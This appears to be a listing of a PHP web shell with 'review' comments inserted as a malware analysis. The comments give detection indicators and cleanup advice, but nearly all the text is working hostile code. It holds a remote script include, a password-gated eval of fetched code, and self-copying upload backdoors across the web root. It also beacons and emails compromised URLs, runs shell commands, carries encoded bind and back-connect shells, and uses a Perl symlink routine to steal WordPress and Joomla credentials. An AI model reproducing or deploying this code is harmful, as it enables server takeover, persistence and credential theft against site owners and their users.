2?><script src=hxxp://r00t.info/ccb.js></script>
3<?php
// NOTE(review): every call on this line is prefixed with @ and switches off a
// PHP diagnostic channel for the current request: error_reporting(0),
// error_log set to NULL, log_errors and display_errors set to 0. The execution
// time limit is lifted as well (max_execution_time 0, set_time_limit(0)).
// Detection consequence: do not expect activity from this file in the PHP
// error log; trace it through web-server access logs and file-integrity
// monitoring instead.
@session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('output_buffering',0); @set_time_limit(0); @set_magic_quotes_runtime(0); ?>
4<?php
// NOTE(review): persistence stage. This block (1) keeps the source of a
// second-stage page in $a, (2) exposes a hash-gated eval of fetched content,
// (3) writes $a into directories under the document root, and (4) reports the
// infected URL to a remote host. The `hxxp` spellings (including inside
// $_SERVER keys) look like defanging applied by the listing to every `http`
// substring - presumably not in the original sample; confirm against a clean copy.
@session_start(); @error_reporting(0);
// $a is a string literal, not executed here. As written it is a page that sets
// $_SESSION["adm"] when md5(sha1(POST "p")) equals the hard-coded digest, and,
// once that flag is set, prints php_uname() plus an upload form and copy()s the
// uploaded file to its client-supplied name. The digits at the start of each
// line inside the literal (5 ... 20) look like line numbers captured by the
// paste listing - confirm before hashing or signature matching.
// Indicator: the 32-character digest string is stable and can be searched for
// across the web root.
$a = '<?php
5session_start();
6if($_SESSION["adm"]){
7echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\'; } else { echo \'<b>Upload Fail !!!</b><br><br>\'; }}
8}
9if($_POST["p"]){
10$p = $_POST["p"];
11$pa = md5(sha1($p));
12if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){
13$_SESSION["adm"] = 1;
14}
15}
16?>
17<form action="" method="post">
18<input type="text" name="p">
19</form>
20';
// Hash-gated code execution: when md5(sha1(request "px")) equals the same
// digest, the location named by request parameter "404" is read with
// file_get_contents() and the result is passed to eval().
// Detection: requests carrying both `px` and `404` parameters. $_REQUEST is
// used, so the values may arrive outside the query string, which default
// access logs do not record - TODO confirm logging coverage.
if(@$_REQUEST["px"]){ $p = @$_REQUEST["px"]; $pa = md5(sha1($p)); if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){ echo @eval(@file_get_contents(@$_REQUEST["404"])); } }
// Runs only while $_SESSION["sdm"] is unset, and sets it at the end.
// Lists DOCUMENT_ROOT, removes the "." and ".." entries, and for every entry
// that is a directory opens "<entry>/newsr.php" in "w" mode and writes $a to it.
// Clean-up: search the whole document root for files named newsr.php; "w" mode
// truncates, so a pre-existing file of that name must be restored from backup.
if(@!$_SESSION["sdm"]){ $doc = $_SERVER["DOCUMENT_ROOT"]; $dir = scandir($doc); $d1 = ''.$doc.'/.'; $d2 = ''.$doc.'/..'; if(($key = @array_search('.', $dir)) !== false) { unset($dir[$key]); } if(($key = @array_search('..', $dir)) !== false) { unset($dir[$key]); } if(($key = @array_search($d1, $dir)) !== false) { unset($dir[$key]); } if(($key = array_search($d2, $dir)) !== false) { unset($dir[$key]); } @array_push($dir,$doc); foreach($dir as $d){ $p = $doc."/".$d; if(is_dir($p)){ $file = $p."/newsr.php"; @touch($file); $folder = @fopen($file,"w"); @fwrite($folder,$a); } }
// Beacon: builds the current request URL from the host and REQUEST_URI,
// URL-encodes the User-Agent, and requests the yaz.php endpoint named in the
// first string with both values appended (base64_decode("JmI=") yields "&b").
// The response body is echoed into the page being served. The first
// base64_decode() argument reads as an already-decoded URL - presumably
// altered by the listing; confirm.
// Network indicator: outbound HTTP from the web server to that host.
$lls = $_SERVER["hxxp_HOST"]; $llc = $_SERVER["REQUEST_URI"]; $lld = 'hxxp://'.$lls.''.$llc.''; $brow = urlencode($_SERVER['hxxp_USER_AGENT']); $retValue = file_get_contents(base64_decode("hxxp://r00t.info/yaz.php?a")."=".$lld.base64_decode("JmI=")."=".$brow); echo $retValue; @$_SESSION["sdm"]=1; } ?>
23<?php
// NOTE(review): content-injection stage. When POST "query" is present it is
// passed through stripslashes() twice and written to the relative file
// data.txt; otherwise up to six lines of data.txt are read and echoed into the
// response without escaping, so the last posted value is rendered to visitors.
// Indicators: an unexpected data.txt next to PHP entry points, POST requests
// with a `query` field.
if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query'])); $data = "data.txt"; @touch ("data.txt"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $veriyfy ) ; @fclose ($ver); }else{ $datas=@fopen("data.txt",'r'); $i=0; while ($i <= 5) { $i++; $blue=@fgets($datas,1024); echo $blue; } }
// If the absolute path /modules/indexx.php cannot be opened: creates a relative
// "modules" directory, fetches lamer.txt from the remote host, writes the body
// to /modules/indexx.php, and sends an HTML mail containing the current site
// URL to two hard-coded recipients. The message text names modules/dbs.php,
// which differs from the path written above.
// Indicators: the file names indexx.php and dbs.php, a new modules/ directory,
// the mail subject and From header in MTA logs, outbound HTTP to the remote
// host. "Hacklink" in the subject suggests link-spam use - presumably; confirm.
$datasi=@fopen("/modules/indexx.php",'r'); if($datasi){ }else{ @mkdir("modules"); $dos = file_get_contents("hxxp://r00t.info/txt/lamer.txt"); $data = "/modules/indexx.php"; @touch ("/modules/indexx.php"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $dos ) ; @fclose ($ver); $yol = "hxxp://".$_SERVER['hxxp_HOST']."".$_SERVER['REQUEST_URI'].""; $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : modules/dbs.php</h1>'; $header .= "From: SheLL Boot <suppor@nic.org>\n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("priphp@hotmail.com", "Hacklink Bildiri", "$y", $header); } ?><?php
// File-manager stage begins. $auth_pass is a 32-hex-character string and
// $default_action is 'FilesMan'; neither is referenced again on this line.
// Both literals are usable as static signatures.
$auth_pass = "39352d42823587e2152e181173b0972a"; $color = "#FF0000"; $default_action = 'FilesMan'; @define('SELF_PATH', __FILE__);
// Cloaking: a request whose User-Agent contains "Google" receives a 404 status
// line and the script exits. Crawl-based scanning with such a User-Agent will
// not see this page; verify by inspecting the file system.
if( strpos($_SERVER['hxxp_USER_AGENT'],'Google') !== false ) { header('hxxp/1.0 404 Not Found'); exit; }
// Error reporting and PHP error logging are switched off for the request.
@session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('output_buffering',0);
// File read-out: the path given in query parameter `dl` (or `dlgzip`, which
// gzip-encodes the content) is read with file_get_contents() and returned as
// an attachment, then the script exits.
// Incident scoping: treat every file readable by the web-server account as
// potentially disclosed, and search access logs for `dl=` and `dlgzip=`.
if(isset($_GET['dl']) && ($_GET['dl'] != "")){ $file = $_GET['dl']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file)."\";"); echo $filez; exit; } elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){ $file = $_GET['dlgzip']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file).".gz\";"); echo $filez; exit; }
// The `img` handler opened here continues on the following line of the listing.
if(isset($_GET['img'])){ 
@ob_clean(); $d = magicboom($_GET['y']); $f = $_GET['img']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}} function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}} function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}} function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}} function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}} if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } function convertByte($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." 
>"; $pwd = realpath(".")."\\"; $v = explode("\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\"); if ($bool) { $letters .= "<a href=\"?y=".$letter.":\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\"gaya\">".$letter."</span>";} $letters .= " ]</a> "; } } } function testoracle() { if (function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); } } function testmssql() { if (function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); } } function showdisablefunctions() { if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; } else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["hxxp_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR']; $admin_id=$_SERVER['SERVER_ADMIN']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } if(isset($_POST['chmod'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value;} @chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} if(isset($_POST['chmod_folder'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . 
$value;} @chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} $buff = "Software : <b>".$software."</b><br />"; $buff .= "System OS : <b>".$system."</b><br />"; if($id != "") $buff .= "ID : <b>".$id."</b><br />"; $buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />"; $buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />"; $buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />"; if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />"; else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />"; $buff .= "Disabled Functions: ".showdisablefunctions()."<br />"; $buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>"; $buff .= "<font color=00ff00 ><b>".$letters." > ".$pwdurl."</b></font>"; $injbuff = "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"; eval(base64_decode($injbuff)); function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = @scandir($pwd)){ foreach($dh as $file){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } } else{ if($dh = @opendir($pwd)){ while($file = @readdir($dh)){ if(@is_dir($file)){ $dname[] = $file; } elseif(@is_file($file)){ $fname[] = $file; } } @closedir($dh); } } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = "
24 <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
25 <table class=\"cmdbox\" style=\"width:50%;\">
26 <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
27 </form>
28 <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
29 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
30 <tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
31 </form></table><table class=\"explore\">
32 <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
33 "; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
34 <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
35 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
36 <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
37 <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
38 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
39 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
40 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
41 </form></td>
42
43 </tr>
44 "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,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'> $folder</a></td><td>LINK</td>
45 <td style=\"text-align:center;\">".$owner."</td>
46 <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
47 <td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
48 <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
49 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
50 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
51 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
52 </form>
53 </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
54 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
55 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
56 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
57 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
58 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
59 </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
60 <td><center>
61 <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
62 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
63 <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
64 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
65 <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
66 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
67 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
68 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,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' /> $file</b></a>
69 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
70 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
71 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
72 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
73 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
74 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
75 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
76 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
77<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
78<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
79<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
80<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
81 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
82 <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." 
> ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
83+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
84P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
85dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
863TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
87Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
88HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
89tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
90ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
91uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
92NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
93tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
94e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
95LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
96vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
97+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
98ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
99S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
100ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
101Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
102BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
103zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
104i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
105RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
106jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
1076f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; $configshell = '#!/usr/bin/perl -I/usr/local/bandmin
108print "Content-type: text/html\n\n";
109print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hxxp://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
110<html xmlns="hxxp://www.w3.org/1999/xhtml">
111
112<head>
113<meta hxxp-equiv="Content-Language" content="en-us" />
114<meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8" />
115<title>Priv8 SCR</title>
116<style type="text/css">
117.newStyle1 {
118 font-family: tahoma, verdana, Arial;
119 font-size: medium;
120 color: #FFFFFF;
121 background-color: #666666;
122 text-align: center;
123}
124</style>
125</head>
126';
127sub lil{
128 ($user) = @_;
129$msr = qx{pwd};
130$kola=$msr."/".$user;
131$kola=~s/\n//g;
132symlink('/home/'.$user.'/public_html/beta/configuration.php',$kola.'-joomla.txt') ;
133 symlink('/home/'.$user.'/public_html/configuration.php',$kola.'-joomla.txt') ;
134 symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'-joomla - home.txt') ;
135 symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wordpress.txt') ;
136 symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wordpress.txt') ;
137 symlink('/home/'.$user.'/public_html/web/wp-config.php',$kola.'-wordpress - web.txt') ;
138 symlink('/home/'.$user.'/public_html/SSI.php',$kola.'- C M F .txt') ;
